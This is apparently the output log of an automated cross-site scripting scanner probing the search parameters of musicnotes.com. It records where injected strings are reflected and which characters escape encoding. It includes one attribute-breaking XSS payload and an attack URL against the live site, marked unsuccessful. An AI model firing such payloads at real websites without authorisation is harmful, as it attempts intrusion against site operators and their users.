https://www.musicnotes.com/search/go?p=Q&lbc=musicnotes&w=*&isort=score&method=and&view=list&af=producttype:lilnotemned&intcmp=HomePage:Position1:FreeMNE

GET Params:[2]
['w', 'from']
_______________________________________________________________________________________________________
https://www.musicnotes.com/search/go?w=(uvw"xyz'yxz</zxy&from=1

----------------------------------------------------------------------------------
Attribute Context: [1]
<input type="text" id="sli_search_1" name="w" 
               placeholder="Search for Artist Name or Song Title" class="form-control sli_search_box" autocomplete="off" data-provide="rac" value="(uvw&#034;xyz'yxz /zxy">

----------------------------------------------------------------------------------
HTML Context: [1]
<title>Musicnotes.com - Search Results for (uvw&#034;xyz'yxz /zxy</title>

----------------------------------------------------------------------------------
Script Context: [2]
<script language="javascript" type="text/javascript">var facet_url='https://www.musicnotes.com/search/go?from=1&lbc=musicnotes&method=or&p=Q&ts=custom-v2&uid=303500567&w=%28uvw%22xyz%27yxz%20%2fzxy';</script>
<script language="javascript" type="text/javascript">
	spark.addSearch("(uvw&#034;xyz\'yxz /zxy","0","1","","score");
	
	spark.writeTrackCode();
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.musicnotes.com/search/go?w=' onmouseover='alert(1)&from=1

 ______ UnSuccessful with payload: ' onmouseover='alert(1)

ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	True

Attack Payloads for SCRIPT
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	False

Attack Payloads for SCRIPT
[]
_______________________________________________________________________________________________________
https://www.musicnotes.com/search/go?w=*&from=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script language="javascript" type="text/javascript">var facet_url='https://www.musicnotes.com/search/go?from=%28uvw%22xyz%27yxz%20%2fzxy&isort=globalpop&lbc=musicnotes&method=and&p=Q&ts=custom-v2&uid=303548857&w=*';</script>

----------------------------------------------------------------------------------
URI Context: [6]
<a href="https://www.musicnotes.com/search/go?from=%28uvw%22xyz%27yxz%20%2fzxy&isort=globalpop&lbc=musicnotes&method=and&p=Q&ts=custom-v2&uid=303548857&w=*&format=inst1" rel="nofollow">
<a href="https://www.musicnotes.com/search/go?from=%28uvw%22xyz%27yxz%20%2fzxy&isort=globalpop&lbc=musicnotes&method=and&p=Q&ts=custom-v2&uid=303548857&w=*&format=scor1" rel="nofollow">
<a href="https://www.musicnotes.com/search/go?from=%28uvw%22xyz%27yxz%20%2fzxy&isort=globalpop&lbc=musicnotes&method=and&p=Q&ts=custom-v2&uid=303548857&w=*&format=genre1" rel="nofollow">
<a href="https://www.musicnotes.com/search/go?from=%28uvw%22xyz%27yxz%20%2fzxy&lbc=musicnotes&method=and&p=Q&ts=custom-v2&uid=303548857&w=*&isort=title"class="sortby sli_title">
<a href="https://www.musicnotes.com/search/go?from=%28uvw%22xyz%27yxz%20%2fzxy&lbc=musicnotes&method=and&p=Q&ts=custom-v2&uid=303548857&w=*&isort=artist"class="sortby">
<a href="https://www.musicnotes.com/search/go?from=%28uvw%22xyz%27yxz%20%2fzxy&lbc=musicnotes&method=and&p=Q&ts=custom-v2&uid=303548857&w=*&isort=scoring"class="sortby">

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	True

Attack Payloads for SCRIPT
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
